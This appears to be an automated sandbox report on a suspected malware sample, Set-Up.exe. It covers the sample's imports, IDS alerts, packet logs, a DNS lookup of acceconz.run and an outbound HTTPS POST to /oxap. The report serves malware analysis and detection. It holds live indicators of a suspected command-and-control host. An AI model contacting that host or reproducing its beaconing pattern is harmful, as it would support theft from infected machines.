REGISTRY	0x45eb58	0x2b1	ASCII text, with CRLF line terminators	Hebrew	Israel	0.444121915820029
REGISTRY	0x45ee10	0x2a1	ASCII text, with CRLF line terminators	Hebrew	Israel	0.45022288261515603
REGISTRY	0x45f0b8	0x281	ASCII text, with CRLF line terminators	Hebrew	Israel	0.4664586583463339
REGISTRY	0x45f340	0x2b1	ASCII text, with CRLF line terminators	Hebrew	Israel	0.444121915820029
REGISTRY	0x45f5f8	0x301	ASCII text, with CRLF line terminators	Hebrew	Israel	0.40312093628088425
REGISTRY	0x45f900	0x2a1	ASCII text, with CRLF line terminators	Hebrew	Israel	0.45468053491827637
TYPELIB	0x45fe80	0xbf98	data	Hebrew	Israel	0.36209427499592234
RT_VERSION	0x45fba8	0x2d4	data	Hebrew	Israel	0.4613259668508287
RT_MANIFEST	0x46be18	0x196	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	English	United States	0.5738916256157636

Imports

DLL	Import
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
PSAPI.DLL	GetProcessImageFileNameW, GetModuleFileNameExW
WS2_32.dll	getsockopt, htonl, inet_addr, ioctlsocket, accept, listen, bind, sendto, getsockname, select, __WSAFDIsSet, shutdown, recvfrom, WSASocketA, WSAAsyncSelect, WSAEventSelect, WSAIoctl, WSASetLastError, gethostbyname, WSAAddressToStringA, WSAStringToAddressA, inet_ntoa, socket, connect, send, recv, closesocket, WSAStartup, WSACleanup, setsockopt, WSAGetLastError, WSCGetProviderPath, WSCEnumProtocols, htons, gethostname, freeaddrinfo, getaddrinfo
KERNEL32.dll	InitializeCriticalSection, TerminateProcess, EnterCriticalSection, LeaveCriticalSection, GetCurrentThread, GetModuleFileNameA, IsDBCSLeadByte, FindResourceA, LoadLibraryExA, GetTempPathW, CopyFileW, CreateThread, GetCurrentThreadId, SetCurrentDirectoryW, GetCurrentDirectoryA, GetCommandLineA, ReadProcessMemory, IsWow64Process, GetNativeSystemInfo, Process32NextW, Process32FirstW, FreeConsole, WriteConsoleInputA, GetStdHandle, GetWindowsDirectoryA, SetFileAttributesW, GetSystemInfo, FormatMessageA, GetFileSize, WaitForMultipleObjects, WaitForSingleObject, PulseEvent, TerminateThread, SetThreadAffinityMask, GetThreadPriority, SetThreadPriority, ResumeThread, ReleaseSemaphore, CreateSemaphoreA, ReleaseMutex, DeleteFileA, GetFullPathNameA, SetStdHandle, GetTimeZoneInformation, SetFilePointer, GetFileType, SetHandleCount, ReadFile, HeapSize, LCMapStringW, LCMapStringA, IsValidCodePage, GetOEMCP, GetACP, GetCPInfo, ExitProcess, FatalAppExitA, VirtualFree, HeapDestroy, HeapCreate, GetConsoleMode, GetConsoleCP, WriteFile, GetLogicalDriveStringsA, CreateToolhelp32Snapshot, Process32First, Process32Next, CreateProcessW, GetShortPathNameW, GetTempPathA, GetCurrentProcess, GetModuleHandleA, lstrcmpiA, GetWindowsDirectoryW, GetLocalTime, GetSystemTime, GetDateFormatA, GetTimeFormatA, DeviceIoControl, CreateFileA, LoadLibraryW, SetLastError, DeleteCriticalSection, WideCharToMultiByte, RaiseException, CreateEventA, LocalFree, GetSystemDirectoryA, GetSystemDirectoryW, ExpandEnvironmentStringsW, SetEvent, Sleep, ResetEvent, LoadLibraryA, GetProcAddress, SetFileAttributesA, FreeLibrary, DeleteFileW, RemoveDirectoryW, GetTickCount, OpenProcess, GetLastError, CloseHandle, GetCurrentProcessId, InterlockedIncrement, InterlockedDecrement, lstrlenA, MultiByteToWideChar, FindResourceW, LoadResource, LockResource, SizeofResource, GetModuleFileNameW, GetFileInformationByHandle, PeekNamedPipe, SetCurrentDirectoryA, FlushFileBuffers, FreeEnvironmentStringsA, GetEnvironmentStrings, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileW, InitializeCriticalSectionAndSpinCount, SetConsoleCtrlHandler, GetLocaleInfoW, GetLocaleInfoA, InterlockedExchange, GetStringTypeA, GetStringTypeW, TlsFree, TlsSetValue, TlsAlloc, TlsGetValue, GetStartupInfoA, FindFirstFileA, GetDriveTypeA, FileTimeToLocalFileTime, FileTimeToSystemTime, FindClose, LocalFileTimeToFileTime, SetFileTime, GetSystemTimeAsFileTime, VirtualQuery, VirtualAlloc, VirtualProtect, HeapReAlloc, HeapAlloc, HeapFree, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlUnwind, SystemTimeToFileTime, GetUserDefaultLCID, EnumSystemLocalesA, IsValidLocale, SetEndOfFile, GetProcessHeap, CompareStringA, CompareStringW, SetEnvironmentVariableA, GetVersion, FindNextFileA, GlobalMemoryStatus, FlushConsoleInputBuffer, GetFileAttributesA, GetVersionExA, LocalAlloc, lstrlenW, VerSetConditionMask, VerifyVersionInfoA, CreateDirectoryW, GetModuleHandleW, ReadConsoleInputA, SetConsoleMode, PeekConsoleInputA, GetNumberOfConsoleInputEvents, CreateMutexA
USER32.dll	GetDC, ReleaseDC, MessageBoxA, GetUserObjectInformationW, LoadStringA, CharNextA, CharNextW, PostThreadMessageA, DispatchMessageA, PeekMessageA, SetThreadDesktop, MsgWaitForMultipleObjectsEx, DestroyWindow, CreateWindowExA, UnregisterClassA, DefWindowProcA, RegisterClassA, KillTimer, PostMessageA, GetMessageA, TranslateMessage, SetTimer, GetProcessWindowStation, CreateDesktopA, SetProcessWindowStation
ADVAPI32.dll	CryptGenKey, GetSidSubAuthorityCount, GetTokenInformation, OpenProcessToken, RegSetValueExA, RegisterEventSourceA, RegCloseKey, RegCreateKeyA, RegOpenKeyExA, RegQueryValueExA, SetNamedSecurityInfoA, GetSecurityDescriptorSacl, ConvertStringSecurityDescriptorToSecurityDescriptorA, FreeSid, SetSecurityDescriptorDacl, InitializeSecurityDescriptor, SetEntriesInAclA, AllocateAndInitializeSid, CryptReleaseContext, CryptDestroyHash, CryptGetHashParam, CryptHashData, CryptCreateHash, CryptAcquireContextA, RegOpenKeyExW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, ConvertSidToStringSidA, LookupPrivilegeValueA, AdjustTokenPrivileges, DeleteService, ChangeServiceConfigW, StartServiceCtrlDispatcherA, RegisterServiceCtrlHandlerW, CreateServiceW, ChangeServiceConfig2A, QueryServiceConfigW, ChangeServiceConfigA, RegQueryInfoKeyA, OpenThreadToken, SetSecurityDescriptorGroup, SetSecurityDescriptorOwner, IsValidSid, GetLengthSid, CopySid, RegCreateKeyExA, RegDeleteValueA, SetServiceStatus, RegisterEventSourceW, ReportEventA, DeregisterEventSource, OpenServiceW, GetSecurityDescriptorLength, ConvertStringSecurityDescriptorToSecurityDescriptorW, RegDeleteKeyA, RegQueryValueExW, RegEnumKeyA, ConvertStringSidToSidA, LookupAccountSidW, QueryServiceStatus, ControlService, RegOpenKeyA, RegEnumKeyExA, QueryServiceStatusEx, OpenSCManagerA, OpenServiceA, CloseServiceHandle, StartServiceA, GetSidSubAuthority
ole32.dll	CoTaskMemAlloc, CoRegisterClassObject, CoRevokeClassObject, CoCreateFreeThreadedMarshaler, CoInitialize, CoUninitialize, CoTaskMemRealloc, CoInitializeSecurity, CoInitializeEx, StringFromIID, CoCreateGuid, StringFromGUID2, CoCreateInstance, ProgIDFromCLSID, CoTaskMemFree
OLEAUT32.dll	SysAllocString, LoadTypeLib, VariantClear, GetErrorInfo, LoadRegTypeLib, VarUI4FromStr, RegisterTypeLib, UnRegisterTypeLib, VariantChangeType, VariantInit, SysAllocStringByteLen, SysAllocStringLen, CreateErrorInfo, SetErrorInfo, SysStringLen, SysFreeString, SysStringByteLen
RPCRT4.dll	RpcServerInqCallAttributesW
NETAPI32.dll	NetUserGetInfo, NetApiBufferFree
Secur32.dll	GetUserNameExW
IPHLPAPI.DLL	GetExtendedTcpTable
CRYPT32.dll	CertEnumCertificatesInStore, CertEnumCRLsInStore, CertCreateCertificateContext, CertOpenSystemStoreA, CertGetCertificateChain, CertFreeCertificateChain, CertNameToStrA, CryptQueryObject, CryptMsgGetParam, CertFindCertificateInStore, CertGetNameStringW, CertStrToNameA, CertCreateSelfSignCertificate, CryptMsgClose, CertCloseStore, CertFreeCertificateContext, CryptMemFree, CryptBinaryToStringA, CryptMemAlloc, PFXExportCertStoreEx, CertOpenStore, CryptAcquireCertificatePrivateKey
GDI32.dll	CreateCompatibleBitmap, GetObjectA, GetDIBits, DeleteObject, GetDeviceCaps

Version Infos

Description	Data
Comments	SafeIPS.exe
CompanyName	SafeIP
FileDescription
FileVersion	2.3.5.7
InternalName
LegalCopyright
LegalTrademarks
OriginalFilename
PrivateBuild
ProductName	SafeIPS.exe
ProductVersion	2.3.5.7
SpecialBuild
Translation	0x0000 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Hebrew	Israel

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-04-13T16:21:26.207931+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49696	172.67.131.70	443	TCP
2025-04-13T16:21:28.020856+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49699	172.67.131.70	443	TCP
2025-04-13T16:21:29.524469+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49700	172.67.131.70	443	TCP
2025-04-13T16:21:30.812705+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49701	172.67.131.70	443	TCP
2025-04-13T16:21:32.806562+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49702	172.67.131.70	443	TCP
2025-04-13T16:21:34.094122+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49703	172.67.131.70	443	TCP
2025-04-13T16:21:36.637717+0200	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49704	172.67.131.70	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 13, 2025 16:21:25.939619064 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:25.939681053 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:25.939907074 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:25.941663980 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:25.941684961 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:26.207792044 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:26.207931042 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:26.210267067 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:26.210280895 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:26.210611105 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:26.266321898 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:26.266388893 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:26.266457081 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:26.855565071 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:26.855619907 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:26.855665922 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:26.855670929 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:26.855705976 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:26.855736971 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:26.855752945 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:26.855763912 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:26.855787039 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:26.855808020 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:26.855808973 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:26.855823040 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:26.855845928 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:26.856447935 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:26.856473923 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:26.856487989 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:26.856501102 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:26.856539965 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:27.003308058 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:27.003381968 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:27.003410101 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:27.003434896 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:27.003468037 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:27.003513098 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:27.003628016 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:27.004036903 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:27.004069090 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:27.004074097 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:27.004086018 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:27.004118919 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:27.004129887 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:27.004762888 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:27.004801035 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:27.004805088 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:27.004812956 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:27.004852057 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:27.004858971 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:27.005528927 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:27.005567074 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:27.005569935 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:27.005578041 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:27.005614042 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:27.005620003 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:27.005656958 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:27.005693913 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:27.008641005 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:27.008667946 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:27.008682966 CEST	49696	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:27.008691072 CEST	443	49696	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:27.783005953 CEST	49699	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:27.783098936 CEST	443	49699	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:27.783479929 CEST	49699	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:27.783565044 CEST	49699	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:27.783581972 CEST	443	49699	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:28.020684004 CEST	443	49699	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:28.020855904 CEST	49699	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:28.022052050 CEST	49699	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:28.022069931 CEST	443	49699	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:28.022416115 CEST	443	49699	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:28.024279118 CEST	49699	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:28.024620056 CEST	49699	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:28.024662018 CEST	443	49699	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:28.024729013 CEST	49699	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:28.024740934 CEST	443	49699	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:28.882862091 CEST	443	49699	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:28.883162975 CEST	443	49699	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:28.883349895 CEST	49699	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:28.884876013 CEST	49699	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:28.884917021 CEST	443	49699	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:29.262048006 CEST	49700	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:29.262144089 CEST	443	49700	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:29.262218952 CEST	49700	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:29.262679100 CEST	49700	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:29.262717009 CEST	443	49700	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:29.524281025 CEST	443	49700	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:29.524468899 CEST	49700	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:29.526185989 CEST	49700	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:29.526215076 CEST	443	49700	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:29.527214050 CEST	443	49700	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:29.529031038 CEST	49700	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:29.529181004 CEST	49700	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:29.529227018 CEST	443	49700	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:29.529284000 CEST	49700	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:29.572272062 CEST	443	49700	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:30.239306927 CEST	443	49700	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:30.239579916 CEST	443	49700	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:30.239808083 CEST	49700	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:30.239938021 CEST	49700	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:30.239980936 CEST	443	49700	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:30.567241907 CEST	49701	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:30.567328930 CEST	443	49701	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:30.567459106 CEST	49701	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:30.567881107 CEST	49701	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:30.567919970 CEST	443	49701	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:30.812516928 CEST	443	49701	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:30.812705040 CEST	49701	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:30.815224886 CEST	49701	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:30.815244913 CEST	443	49701	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:30.816351891 CEST	443	49701	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:30.822796106 CEST	49701	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:30.823124886 CEST	49701	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:30.823214054 CEST	443	49701	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:30.823383093 CEST	49701	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:30.823400021 CEST	443	49701	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:31.559853077 CEST	443	49701	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:31.560142994 CEST	443	49701	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:31.560272932 CEST	49701	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:31.560273886 CEST	49701	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:32.545768023 CEST	49702	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:32.545803070 CEST	443	49702	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:32.545906067 CEST	49702	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:32.546216965 CEST	49702	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:32.546228886 CEST	443	49702	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:32.806438923 CEST	443	49702	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:32.806561947 CEST	49702	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:32.808573961 CEST	49702	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:32.808582067 CEST	443	49702	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:32.809036016 CEST	443	49702	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:32.810192108 CEST	49702	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:32.810292006 CEST	49702	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:32.810318947 CEST	443	49702	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:33.360879898 CEST	443	49702	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:33.361144066 CEST	443	49702	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:33.361309052 CEST	49702	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:33.361421108 CEST	49702	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:33.361438990 CEST	443	49702	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:33.827982903 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:33.828062057 CEST	443	49703	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:33.828149080 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:33.828469992 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:33.828504086 CEST	443	49703	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:34.093967915 CEST	443	49703	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:34.094121933 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:34.095371008 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:34.095392942 CEST	443	49703	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:34.096330881 CEST	443	49703	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:34.101130009 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:34.102051020 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:34.102101088 CEST	443	49703	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:34.102200985 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:34.102251053 CEST	443	49703	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:34.102364063 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:34.102416039 CEST	443	49703	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:34.102549076 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:34.102581024 CEST	443	49703	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:34.102742910 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:34.102782011 CEST	443	49703	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:34.102947950 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:34.102986097 CEST	443	49703	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:34.103015900 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:34.103152037 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:34.103195906 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:34.148272991 CEST	443	49703	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:34.148618937 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:34.148689985 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:34.148709059 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:34.192306042 CEST	443	49703	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:34.192641020 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:34.192704916 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:34.192751884 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:34.240268946 CEST	443	49703	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:34.240462065 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:34.288269043 CEST	443	49703	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:34.473711014 CEST	443	49703	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:36.343648911 CEST	443	49703	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:36.343947887 CEST	443	49703	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:36.343945980 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:36.344017982 CEST	49703	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:36.386941910 CEST	49704	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:36.387042046 CEST	443	49704	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:36.387136936 CEST	49704	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:36.394628048 CEST	49704	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:36.394644976 CEST	443	49704	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:36.637316942 CEST	443	49704	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:36.637717009 CEST	49704	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:36.639628887 CEST	49704	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:36.639657021 CEST	443	49704	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:36.640516043 CEST	443	49704	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:36.642045975 CEST	49704	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:36.642085075 CEST	49704	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:36.642152071 CEST	443	49704	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:37.317663908 CEST	443	49704	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:37.317830086 CEST	443	49704	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:37.317920923 CEST	49704	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:37.321774960 CEST	49704	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:37.321824074 CEST	443	49704	172.67.131.70	192.168.2.5
Apr 13, 2025 16:21:37.321852922 CEST	49704	443	192.168.2.5	172.67.131.70
Apr 13, 2025 16:21:37.321870089 CEST	443	49704	172.67.131.70	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 13, 2025 16:21:25.731234074 CEST	62626	53	192.168.2.5	1.1.1.1
Apr 13, 2025 16:21:25.930370092 CEST	53	62626	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 13, 2025 16:21:25.731234074 CEST	192.168.2.5	1.1.1.1	0xaaa7	Standard query (0)	acceconz.run	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 13, 2025 16:21:25.930370092 CEST	1.1.1.1	192.168.2.5	0xaaa7	No error (0)	acceconz.run		172.67.131.70	A (IP address)	IN (0x0001)	false
Apr 13, 2025 16:21:25.930370092 CEST	1.1.1.1	192.168.2.5	0xaaa7	No error (0)	acceconz.run		104.21.10.95	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

acceconz.run

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49696	172.67.131.70	443	7936	C:\Users\user\Desktop\Set-Up.exe

Timestamp	Bytes transferred	Direction	Data
2025-04-13 14:21:26 UTC	261	OUT	POST /oxap HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 51 Host: acceconz.run
